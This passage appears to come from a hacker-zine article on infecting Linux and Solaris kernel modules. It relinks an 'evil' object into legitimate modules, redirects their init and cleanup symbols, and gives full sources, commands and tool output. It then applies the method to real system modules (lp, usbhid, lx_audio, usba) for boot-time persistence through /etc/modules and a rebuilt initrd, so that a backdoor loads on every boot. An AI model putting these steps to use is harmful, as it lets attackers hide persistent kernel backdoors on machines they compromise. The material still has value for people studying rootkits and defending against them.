|
|
...
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
18: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
19: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
20: 00000020 27 FUNC GLOBAL DEFAULT 2 init
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
...
|
|
|
|
So as expected:
|
|
|
|
- the position of init is changed from 14 to 20 in the symbol table;
|
|
- the 'Inf' field in the .symtab header has changed: its current value is
|
|
20 (the index of the last local symbol, 19, plus 1);
|
|
- the binding of init has changed from local to global.
|
|
|
|
Now we can link together orig.ko and evil.ko:
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000040 g F .text 00000020 evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
We can notice that the init symbol is no longer *UND*. The final step is to
|
|
modify the value of init_module:
|
|
|
|
$ ./elfchger -s init_module -v 00000040 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbfc
|
|
>> Index in symbol table: 0x1e
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
Let's try to load the module:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg|tail
|
|
...
|
|
[ 2385.342838] Init Original!
|
|
[ 2385.342845] Init Inject!
|
|
|
|
Cool!! It works!
|
|
|
|
|
|
---[ 4.2 - Static __init init functions
|
|
|
|
|
|
In the previous section it was demonstrated how to inject modules when the
|
|
init function is declared as static. However in some cases the startup
|
|
function in the kernel modules is defined with the __init macro:
|
|
|
|
static int __init function_name();
|
|
|
|
The __init macro is used to describe the function as only being required
|
|
during initialisation time. Once initialisation has been performed, the
|
|
kernel will remove this function and release the corresponding memory.
|
|
|
|
The __init macro is defined in "include/linux/init.h":
|
|
|
|
/*************************************************************************/
|
|
#define __init __section(.init.text) __cold notrace
|
|
/*************************************************************************/
|
|
|
|
The __section macro is defined in "include/linux/compiler.h":
|
|
|
|
/*************************************************************************/
|
|
#define __section(S) __attribute__ ((__section__(#S)))
|
|
/*************************************************************************/
|
|
|
|
While __cold macro is defined in "/include/linux/compiler-gcc*.h":
|
|
|
|
/*************************************************************************/
|
|
#define __cold __attribute__((__cold__))
|
|
/*************************************************************************/
|
|
|
|
When the __init macro is used, a number of GCC attributes are added to the
|
|
function declaration. The __cold attribute informs the compiler to optimize
|
|
it for size instead of speed, because it'll be rarely used. The __section
|
|
attribute informs the compiler to put the text for this function in a new
|
|
section named ".init.text" [5]. How these __init functions are called can
|
|
be checked in "init/main.c":
|
|
|
|
/*************************************************************************/
|
|
static void __init do_initcalls(void)
|
|
{
|
|
initcall_t *fn;
|
|
|
|
for (fn = __early_initcall_end; fn < __initcall_end; fn++)
|
|
do_one_initcall(*fn);
|
|
|
|
/* Make sure there is no pending stuff from the initcall sequence */
|
|
flush_scheduled_work();
|
|
}
|
|
|
|
/*************************************************************************/
|
|
|
|
For each step of the loop inside the do_initcalls() function, an __init
|
|
function set up by the module_init macro is executed. The injection will
|
|
work even if the function is declared with __init.
|
|
|
|
The module orig is as follows:
|
|
|
|
/******************************** orig.c *********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
static int __init init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
static void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
After the compilation and as expected, a new .init.text section has
|
|
appeared:
|
|
|
|
$ objdump -t orig.ko
|
|
...
|
|
00000000 l F .init.text 00000016 init
|
|
00000000 l O .modinfo 0000000c __mod_license6
|
|
00000000 l df *ABS* 00000000 orig.mod.c
|
|
00000020 l O .modinfo 00000023 __mod_srcversion31
|
|
00000043 l O .modinfo 00000009 __module_depends
|
|
00000000 l O __versions 000000c0 ____versions
|
|
00000060 l O .modinfo 0000003b __mod_vermagic5
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000000 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
|
|
Both init and init_module symbols are part of the .init.text section. This
|
|
new issue can be solved by defining the evil() function as __init:
|
|
|
|
/******************************** evil.c *********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init init();
|
|
|
|
int __init evil(void) {
|
|
|
|
init();
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
Both init() and evil() are prefixed with __init because we need them in
|
|
the same section. The same steps described in section 4.1.3 are then
|
|
performed:
|
|
|
|
1 - Change the init binding:
|
|
|
|
$ ./elfchger -g init orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x77c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x7a4
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x8fc
|
|
>> Index in symbol table: 0xf
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 10 to f
|
|
>> Moving symbol from 11 to 10
|
|
>> Moving symbol from 12 to 11
|
|
>> Moving symbol from 13 to 12
|
|
>> Moving symbol from 14 to 13
|
|
>> Moving symbol from 15 to 14
|
|
>> Moving our symbol from 15 to 15
|
|
>> Last LOCAL symbol: 0x15
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0x95c
|
|
>> Index in symbol table: 0x15
|
|
>> Replacing flag 'LOCAL' located at 0x968 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x77c
|
|
|
|
|
|
2 - Link the modules together:
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000016 g F .init.text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000000 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 g F .init.text 00000016 init
|
|
|
|
|
|
3 - Change init_module address:
|
|
|
|
$ ./elfchger -s init_module -v 00000016 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbec
|
|
>> Index in symbol table: 0x1f
|
|
[+] Replacing 0x00000000 with 0x00000016... done!
|
|
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000016 g F .init.text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000016 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 g F .init.text 00000016 init
|
|
|
|
|
|
4 - Load the module in memory:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg|tail
|
|
...
|
|
[ 323.085545] Init Original!
|
|
[ 323.085553] Init Inject!
|
|
|
|
As expected, it works!
|
|
|
|
|
|
---[ 4.3 - What about cleanup_module
|
|
|
|
|
|
These methods work fine with the cleanup_module symbol which is called by
|
|
the kernel when the module is unloaded. Never forget to deal with the
|
|
termination function as well because if you don't and if the infected
|
|
module was removed for some reason then your kernel would most likely crash
|
|
(because there would now be invalid references to the module).
|
|
|
|
The module exit function can be hijacked in the same way, by altering the
|
|
relative address of the cleanup_module symbol with elfchger:
|
|
|
|
$ ./elfchger -s cleanup_module -v address_evil_fn new.ko
|
|
|
|
In this way, when the module is unloaded, the evil() function will be
|
|
invoked instead of the clean() one. You may also need to deal with binding
|
|
issues and __exit attribute but the adaptation of the previous method is
|
|
straightforward.
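
For completeness, the exit-side evil function could look like the sketch
below. As with the init case, the original clean() has to be globalized
first so that the extern reference resolves when the two objects are
linked:

/************************* evil_exit.c (sketch) **************************/
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>

MODULE_LICENSE("GPL");

/* resolved at link time against the globalized clean() of orig.ko */
extern void clean(void);

void evil_exit(void)
{
        printk(KERN_ALERT "Exit Inject!");

        /* do something, then let the original cleanup run */
        clean();

        return;
}
/******************************** EOF ************************************/

After linking, the relative address of evil_exit is the value to pass to
elfchger as the new cleanup_module address.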
|
|
|
|
|
|
---[ 5 - Real life example
|
|
|
|
|
|
This chapter will show the usage of the present method in a real life
|
|
example. Let's suppose that evil.ko is a working backdoor. We want to
|
|
inject it into a kernel module not used by any other kernel module. This
|
|
test was done on Ubuntu 11.10 (x86) with a 3.0.0 kernel.
|
|
|
|
$ uname -a
|
|
Linux ubuntu 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 15:59:53 UTC 2012
|
|
i686 i686 i386 GNU/Linux
|
|
|
|
Let's begin by checking which modules to infect by using the lsmod command:
|
|
|
|
$ lsmod
|
|
|
|
Module Size Used by
|
|
serio_raw 4022 0
|
|
lp 7342 0
|
|
snd_seq_midi 4588 0
|
|
usbhid 36882 0
|
|
binfmt_misc 6599 1
|
|
agpgart 32011 1 drm
|
|
snd_intel8x0 25632 2
|
|
|
|
...
|
|
|
|
libahci 21667 3 ahci
|
|
|
|
The command output shows that some of the modules are not used by any
|
|
other module. These modules can be unloaded safely and then they can be
|
|
infected with our backdoor using the method presented above. This chapter
|
|
is divided into two sections in which I'll describe two techniques to load
|
|
the module when the operating system is booted:
|
|
|
|
1 - Infect a kernel module (or simply add a new one) on
|
|
/etc/modprobe.preload (Fedora, etc.) or in /etc/modules on
|
|
Debian/Ubuntu.
|
|
|
|
2 - Backdoor initrd.
|
|
|
|
|
|
---[ 5.1 - Infecting a kernel module in /etc/modules
|
|
|
|
First of all, we have to know which modules are in the /etc/modules file:
|
|
|
|
$ cat /etc/modules
|
|
# /etc/modules: kernel modules to load at boot time.
|
|
...
|
|
lp
|
|
|
|
As described in the previous section, this module (lp.ko) can be unloaded
|
|
safely and then infected with our backdoor.
|
|
|
|
$ find / -name lp.ko
|
|
...
|
|
/lib/modules/3.0.0-15-generic/kernel/drivers/char/lp.ko
|
|
...
|
|
|
|
$ cd /lib/modules/3.0.0-15-generic/kernel/drivers/char
|
|
|
|
Next, we check which function init_module corresponds to:
|
|
|
|
$ objdump -t lp.ko |grep -e ".init.text"
|
|
00000000 l F .init.text 00000175 lp_init
|
|
00000175 l F .init.text 000000ae lp_init_module
|
|
00000000 l d .init.text 00000000 .init.text
|
|
00000175 g F .init.text 000000ae init_module
|
|
|
|
We want to infect the lp_init_module() function, so the evil module will
|
|
be coded in the following way:
|
|
|
|
/****************** evil.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init lp_init_module();
|
|
|
|
int __init evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject! Lp");
|
|
lp_init_module();
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/****************** EOF **************************************************/
|
|
|
|
Since the lp_init_module function is static we need to change its binding
|
|
type to global.
|
|
|
|
$ ./elfchger -g lp_init_module lp.ko
|
|
[+] Opening lp.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x28a0
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x28c8
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x2b30
|
|
>> Index in symbol table: 0x24
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 25 to 24
|
|
>> Moving symbol from 26 to 25
|
|
>> Moving symbol from 27 to 26
|
|
>> Moving symbol from 28 to 27
|
|
>> Moving symbol from 29 to 28
|
|
>> Moving symbol from 2a to 29
|
|
>> Moving symbol from 2b to 2a
|
|
>> Moving symbol from 2c to 2b
|
|
>> Moving symbol from 2d to 2c
|
|
>> Moving symbol from 2e to 2d
|
|
>> Moving symbol from 2f to 2e
|
|
>> Moving symbol from 30 to 2f
|
|
>> Moving symbol from 31 to 30
|
|
>> Moving symbol from 32 to 31
|
|
>> Moving symbol from 33 to 32
|
|
>> Moving symbol from 34 to 33
|
|
>> Moving symbol from 35 to 34
|
|
>> Moving symbol from 36 to 35
|
|
>> Moving symbol from 37 to 36
|
|
>> Moving symbol from 38 to 37
|
|
>> Moving symbol from 39 to 38
|
|
>> Moving symbol from 3a to 39
|
|
>> Moving symbol from 3b to 3a
|
|
>> Moving symbol from 3c to 3b
|
|
>> Moving symbol from 3d to 3c
|
|
>> Moving our symbol from 36 to 3d
|
|
>> Last LOCAL symbol: 0x3d
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0x2cc0
|
|
>> Index in symbol table: 0x3d
|
|
>> Replacing flag 'LOCAL' located at 0x2ccc with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x28a0
|
|
|
|
The two modules can be now linked together:
|
|
|
|
$ ld -r lp.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko |grep -e init_module -e evil
|
|
00000000 l df *ABS* 00000000 evil.c
|
|
00000000 l df *ABS* 00000000 evil.mod.c
|
|
00000223 g F .init.text 00000019 evil
|
|
00000175 g F .init.text 000000ae lp_init_module
|
|
00000175 g F .init.text 000000ae init_module
|
|
|
|
Now the relative address of init_module has to be changed to 00000223:
|
|
|
|
$ ./elfchger -s init_module -v 00000223 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x2a34
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x2a5c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x39a4
|
|
>> Index in symbol table: 0x52
|
|
[+] Replacing 0x00000175 with 0x00000223... done!
|
|
|
|
The new.ko module must be renamed to lp.ko and then loaded:
|
|
|
|
$ mv new.ko lp.ko
|
|
$ sudo rmmod lp
|
|
$ sudo insmod lp.ko
|
|
$ dmesg|tail
|
|
...
|
|
$ dmesg
|
|
....
|
|
[ 1033.418723] Init Inject! Lp
|
|
[ 1033.431131] lp0: using parport0 (interrupt-driven).
|
|
|
|
From now on, every time the system is booted, the infected lp kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 5.2 - Backdooring initrd
|
|
|
|
It is also possible to backdoor a module in the initrd image. The target
|
|
module has to be extracted out of the image, backdoored and then reinserted
|
|
back. The target module used throughout this example will be usbhid.ko.
|
|
|
|
In order to inject a kernel module into the initrd image, we'll follow the
|
|
guide in [9], which explains how to add a new module inside the initrd
|
|
image. According to [9], the initrd image can be copied from /boot to a
|
|
target directory (e.g. /tmp) so we can easily work on it:
|
|
|
|
$ cp /boot/initrd.img-2.6.35-22-generic /tmp/
|
|
$ cd /tmp
|
|
|
|
The image can be now decompressed using the gzip tool:
|
|
|
|
$ mv initrd.img-2.6.35-22-generic initrd.img-2.6.35-22-generic.gz
|
|
$ gzip -d initrd.img-2.6.35-22-generic.gz
|
|
$ mkdir initrd
|
|
$ cd initrd/
|
|
$ cpio -i -d -H newc -F ../initrd.img-2.6.35-22-generic \
|
|
--no-absolute-filenames
|
|
50522 blocks
|
|
|
|
The location of the usbhid.ko module has then to be found inside the kernel
|
|
tree:
|
|
|
|
$ find ./ -name usbhid
|
|
./lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
|
|
$ cd lib/modules/2.6.35-22-generic/kernel/drivers/hid/usbhid
|
|
|
|
At this point it can be easily infected with our evil module:
|
|
|
|
$ objdump -t usbhid.ko |grep -e ".init.text"
|
|
00000000 l F .init.text 000000c3 hid_init
|
|
00000000 l d .init.text 00000000 .init.text
|
|
00000000 g F .init.text 000000c3 init_module
|
|
000000c3 g F .init.text 00000019 hiddev_init
|
|
|
|
Since we want to infect the hid_init() function, the evil module will be
|
|
coded in the following way:
|
|
|
|
/****************** evil.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init hid_init();
|
|
|
|
int __init evil(void) {
|
|
|
|
hid_init();
|
|
printk(KERN_ALERT "Init Inject! Usbhid");
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/****************** EOF **************************************************/
|
|
|
|
$ ./elfchger -g hid_init usbhid.ko
|
|
[+] Opening usbhid.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0xa24c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0xa274
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xa4dc
|
|
>> Index in symbol table: 0x24
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 25 to 24
|
|
...
|
|
>> Moving symbol from a6 to a5
|
|
>> Moving our symbol from 36 to a6
|
|
>> Last LOCAL symbol: 0xa6
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0xacfc
|
|
>> Index in symbol table: 0xa6
|
|
>> Replacing flag 'LOCAL' located at 0xad08 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0xa24c
|
|
|
|
$ ld -r usbhid.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko | grep -e init_module -e evil
|
|
00000000 l df *ABS* 00000000 evil.c
|
|
00000000 l df *ABS* 00000000 evil.mod.c
|
|
000000dc g F .init.text 0000001b evil
|
|
00000000 g F .init.text 000000c3 init_module
|
|
|
|
|
|
$ ./elf -s init_module -v 000000dc new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0xa424
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0xa44c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xd2dc
|
|
>> Index in symbol table: 0xd5
|
|
[+] Replacing 0x00000000 with 0x000000dc... done!
|
|
|
|
$ mv new.ko usbhid.ko
|
|
|
|
Once the target module has been infected with the evil one, we must
|
|
recreate the initrd image:
|
|
|
|
$ cd /tmp/initrd/
|
|
$ find . | cpio -o -H newc | gzip > /tmp/initrd.img-2.6.35-22-generic
|
|
50522 blocks
|
|
$ cp ../initrd.img-2.6.35-22-generic /boot/
|
|
|
|
From now on, every time the system is booted, the infected usbhid kernel
|
|
module will be loaded instead of the original one.
|
|
|
|
|
|
---[ 6 - What about other systems?
|
|
|
|
|
|
In this last chapter we will see how the presented infection method can be
applied to other operating systems, specifically Solaris, FreeBSD, NetBSD
|
|
and OpenBSD. It will be shown that, even if the method is different from
|
|
that used on Linux, infection is still possible.
|
|
|
|
|
|
---[ 6.1 - Solaris
|
|
|
|
On Solaris systems infecting a kernel module is simpler than on Linux ones.
|
|
Changing the symbol's name in the .strtab ELF section is sufficient,
|
|
similarly to truff's original method for the Linux kernel 2.4.* versions.
|
|
The method has been tested on Solaris 10:
|
|
|
|
# uname -a
|
|
SunOS unknown 5.10 Generic_142910-17 i86pc i386 i86pc
|
|
|
|
|
|
---[ 6.1.1 - A basic example
|
|
|
|
|
|
The orig.c and evil.c source codes are as follows:
|
|
|
|
/******************************** orig.c *********************************/
|
|
#include <sys/ddi.h>
|
|
#include <sys/sunddi.h>
|
|
#include <sys/modctl.h>
|
|
|
|
extern struct mod_ops mod_miscops;
|
|
|
|
static struct modlmisc modlmisc =
|
|
{
|
|
&mod_miscops,
|
|
"original",
|
|
};
|
|
|
|
static struct modlinkage modlinkage =
|
|
{
|
|
MODREV_1,
|
|
(void *) &modlmisc,
|
|
NULL
|
|
};
|
|
|
|
int _init(void) {
|
|
|
|
int i;
|
|
|
|
if ((i = mod_install(&modlinkage)) != 0)
|
|
cmn_err(CE_NOTE, "Can't load module!\n");
|
|
else
|
|
cmn_err(CE_NOTE, "Init Original!");
|
|
|
|
return i;
|
|
}
|
|
|
|
int _info(struct modinfo *modinfop) {
|
|
|
|
return (mod_info(&modlinkage, modinfop));
|
|
}
|
|
|
|
int _fini(void) {
|
|
|
|
int i;
|
|
|
|
if ((i = mod_remove(&modlinkage)) != 0)
|
|
cmn_err(CE_NOTE, "Can't remove module!\n");
|
|
else
|
|
cmn_err(CE_NOTE, "Exit Original!");
|
|
|
|
return i;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
/******************************** evil.c *********************************/
|
|
#include <sys/ddi.h>
|
|
#include <sys/sunddi.h>
|
|
|
|
#include <sys/modctl.h>
|
|
|
|
extern int _evil(void);
|
|
|
|
int _init(void) {
|
|
|
|
cmn_err(CE_NOTE, "Inject!");
|
|
|
|
_evil();
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
The _init function is called at module initialisation, while the _fini one
|
|
is called at module cleanup. The _info function prints information about
|
|
the module when the "modinfo" command is invoked. The two modules can be
|
|
compiled using the following commands:
|
|
|
|
# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c orig.c
|
|
# /usr/sfw/bin/gcc -g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG -O2 -c evil.c
|
|
|
|
Let's have a look at the orig.o ELF file by using the "elfdump" command:
|
|
|
|
# /usr/ccs/bin/elfdump -s orig.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS orig.c
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[16] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[17] 0x00000000 0x0000004d FUNC GLOB D 0 .text _init
|
|
[18] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[19] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
[20] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[21] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[22] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[23] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
|
|
The _evil() function must be called instead of _init when the module is
|
|
loaded. To achieve this, the following steps have to be performed:
|
|
|
|
- Change the _init symbol name to _evil in orig.o;
|
|
- Link the two modules together;
|
|
|
|
This way, the kernel will load the _init() function defined in evil.c which
|
|
in turn will call the _evil() function (the old _init()) in order to
|
|
maintain the correct behaviour of the orig module. It is possible to change
|
|
a symbol name using the 'objcopy' tool. In fact the '--redefine-sym' option
|
|
can be used to give an arbitrary name to the specified symbol:
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil orig.o
|
|
|
|
|
|
By checking with "elfdump" it is possible to verify that the symbol was
properly renamed:
|
|
|
|
# /usr/ccs/bin/elfdump -s orig.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS orig.c
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[16] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[17] 0x00000000 0x0000004d FUNC GLOB D 0 .text _evil
|
|
[18] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[19] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
[20] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[21] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[22] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[23] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
|
|
The _init symbol name has been modified to _evil. The modules are then
|
|
linked together using the "ld" command:
|
|
|
|
# ld -r orig.o evil.o -o new.o
|
|
|
|
The new.o elf file dump follows:
|
|
|
|
# /usr/ccs/bin/elfdump -s new.o
|
|
|
|
Symbol Table Section: .symtab
|
|
index value size type bind oth ver shndx name
|
|
[0] 0x00000000 0x00000000 NOTY LOCL D 0 UNDEF
|
|
[1] 0x00000000 0x00000000 FILE LOCL D 0 ABS new.o
|
|
[2] 0x00000000 0x00000000 SECT LOCL D 0 .text
|
|
|
|
...
|
|
|
|
[27] 0x00000000 0x00000000 FILE LOCL D 0 ABS evil.c
|
|
[28] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_install
|
|
[29] 0x00000000 0x0000004d FUNC GLOB D 0 .text _evil
|
|
[30] 0x00000068 0x0000004d FUNC GLOB D 0 .text _fini
|
|
[31] 0x00000050 0x00000018 FUNC GLOB D 0 .text _info
|
|
[32] 0x000000b8 0x0000001e FUNC GLOB D 0 .text _init
|
|
[33] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_miscops
|
|
[34] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_info
|
|
[35] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF mod_remove
|
|
[36] 0x00000000 0x00000000 NOTY GLOB D 0 UNDEF cmn_err
|
|
|
|
To summarize, the _init symbol now refers to the function defined in
evil.c, while the _evil symbol refers to the old _init defined in
|
|
orig.c that we have just renamed to _evil.
|
|
|
|
Now, the last step is to rename the new.o into orig.o and to load it:
|
|
|
|
# mv new.o orig.o
|
|
# modload orig.o
|
|
# tail /var/adm/messages
|
|
...
|
|
May ... orig.o: [ID 343233 kern.notice] NOTICE: Inject!
|
|
May ... orig.o: [ID 662037 kern.notice] NOTICE: Init Original!
|
|
|
|
As you can see the module is successfully infected.
|
|
|
|
# modinfo | grep orig.o
|
|
247 fa9e6eac 160 - 1 orig.o (original)
|
|
|
|
# modunload -i 247
|
|
|
|
|
|
---[ 6.1.2 - Playing with OS modules
|
|
|
|
|
|
This section will explain how to infect a system kernel module. The method
|
|
remains the same but it will be necessary to make minor changes to the evil
|
|
module in order to correctly load it to memory. The evil module will be
|
|
injected into the audio driver. First of all, the module has to be
|
|
unloaded:
|
|
|
|
# modinfo | grep lx_audio
|
|
216 f99e40e0 2614 242 1 lx_audio (linux audio driver 'lx_audio' 1)
|
|
# modunload -i 216
|
|
|
|
Now, it is possible to play with it:
|
|
|
|
# /usr/ccs/bin/elfdump -s lx_audio|grep _init
|
|
[64] 0x000020c2 0x00000011 FUNC GLOB D 0 .text _init
|
|
[118] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF mutex_init
|
|
|
|
# /usr/sfw/bin/gobjcopy --redefine-sym _init=_evil lx_audio
|
|
# ld -r evil.o lx_audio -o new
|
|
# /usr/ccs/bin/elfdump -s new|grep _evil
|
|
[77] 0x000020de 0x00000011 FUNC GLOB D 0 .text _evil
|
|
|
|
# mv new lx_audio
|
|
# modload lx_audio
|
|
|
|
# tail /var/adm/messages
|
|
...
|
|
|
|
Dec 29 17:00:19 spaccio lx_audio: ... NOTICE: Inject!
|
|
|
|
Great, it works!
|
|
|
|
|
|
---[ 6.1.3 - Keeping it stealthy
|
|
|
|
|
|
According to the /etc/system file, the kernel modules that are loaded at
|
|
boot time are located in the /kernel and /usr/kernel directories. The
|
|
platform-dependent modules reside in the /platform directory. In this
|
|
example I'll infect the usb kernel module: usba.
|
|
|
|
First of all the kernel module's position in the filesystem must be
|
|
located:
|
|
|
|
# find /kernel -name usba
|
|
/kernel/misc/amd64/usba
|
|
/kernel/misc/usba
|
|
/kernel/kmdb/amd64/usba
|
|
/kernel/kmdb/usba
|
|
|
|
# cd /kernel/misc/usba
|
|
|
|
# /usr/ccs/bin/elfdump -s usba|grep _init
|
|
...
|
|
|
|
[291] 0x00017354 0x0000004c FUNC LOCL D 0 .text ugen_ds_init
|
|
[307] 0x00017937 0x000000e3 FUNC LOCL D 0 .text ugen_pm_init
|
|
[347] 0x00000fd4 0x00000074 FUNC GLOB D 0 .text _init
|
|
....
|
|
[655] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF rw_init
|
|
[692] 0x00000000 0x00000000 FUNC GLOB D 0 UNDEF cv_init
|
|
|
|
